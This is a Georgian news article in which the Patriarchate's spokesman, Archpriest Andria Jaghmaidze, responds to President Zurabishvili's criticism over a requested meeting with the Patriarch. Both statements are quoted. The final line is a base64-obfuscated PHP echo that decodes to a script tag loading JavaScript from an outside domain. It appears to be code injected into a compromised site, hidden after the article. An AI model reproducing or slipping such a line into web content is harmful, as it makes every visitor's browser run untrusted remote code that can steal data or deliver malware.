celsiusi
ავერსი საქკაბელი
საპატრიარქოს საზოგადოებასთან ურთიერთობის სამსახურის ხელმძღვანელის, ანდრია ჯაღმაიძის პასუხის პასუხი პრეზიდენტ ზურაბიშვილს - ჯაღმაიძე წერს, რომ მის განცხადებაში პრეზიდენტისადმი უპატივცემულობის განწყობა არ ყოფილა.
 
"დღეს საქართველოს პრეზიდენტის გვერდზე გამოქვეყნებულ სტატუსში საპატრიარქოს საზოგადოებასთან ურთიერთობის ხელმძღვანელის რანგში, ჩემდამი უკმაყოფილებაა გამოთქმული.
 
მაკვირვებს საქართველოს პრეზიდენტის გვერდზე გამოქვეყნებული სტატუსის პათოსი. ჩემს კომენტარში არც განწყობა, არც რაიმე ნიშანი, პრეზიდენტისადმი პატივისცემის ნაკლულევანებისა არ ყოფილა.
 
პრეზიდენტის თხოვნის თაობაზე, პატრიარქთან შეხვედრის სურვილის შესახებ, ჩემთვის ცნობილი გახდა ჟურნალისტის ზარის შემდეგ.
 
დავაზუსტე ამ თხოვნის ფაქტის შესახებ, და ყოველგვარი შეფასების გარეშე ჟურნალისტს გავეცი პასუხი:
 
- დიახ იყო ასეთი თხოვნა პრეზიდენტის მხრიდან, მაგრამ არ მოხერხდა. პრეზიდენტს დღეს სურდა შეხვედრა და არ მოხერხდა. ზოგადად პატრიარქთან შეხვედრა ყოველთვის არ არის შესაძლებელი. დაახლოებით ეს იყო საუბრის შინაარსი. ფაქტს ვერ დავმალავდი და გაუგებარია კონკრეტულად რა შენიშვნას მაძლევს პრეზიდენტი", - წერს ანდრია ჯაღმაიძე.
 
შეგახსენებთ, რომ რამდენიმე საათის წინ, საპატრიარქოს საზოგადოებასთან ურთიერთობის სამსახურის ხელმძღვანელის, დეკანოზ ანდრია ჯაღმაიძის განცხადებას, პრეზიდენტისა და პატრიარქის შეხვედრასთან დაკავშირებით, საქართველოს პრეზიდენტი გამოეხმაურა.
 

"მიზანშეწონილი არაა, რომ საპატრიარქოს საზოგადოებასთან ურთიერთობის სამსახურის ხელმძღვანელი აკეთებდეს საჯარო კომენტარებს! მიგვაჩნია, რომ მან უნდა იცოდეს, როგორ მოიხსენიოს ქვეყნის პატრიარქი და პრეზიდენტი!" - ნათქვამია სალომე ზურაბიშვილის განცხადებაში.
 
ანდრია ჯაღმაიძის განცხადებით, პრეზიდენტს დღეს პატრიარქთან შეხვედრა სურდა, თუმცა  იმის გამო, რომ ასეთი შეხვედრების სურვილისამებრ ნებისმიერ დროს დანიშვნა ვერ ხერხდება, ეს ვიზიტი ვერ შედგა.
 
 
581
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");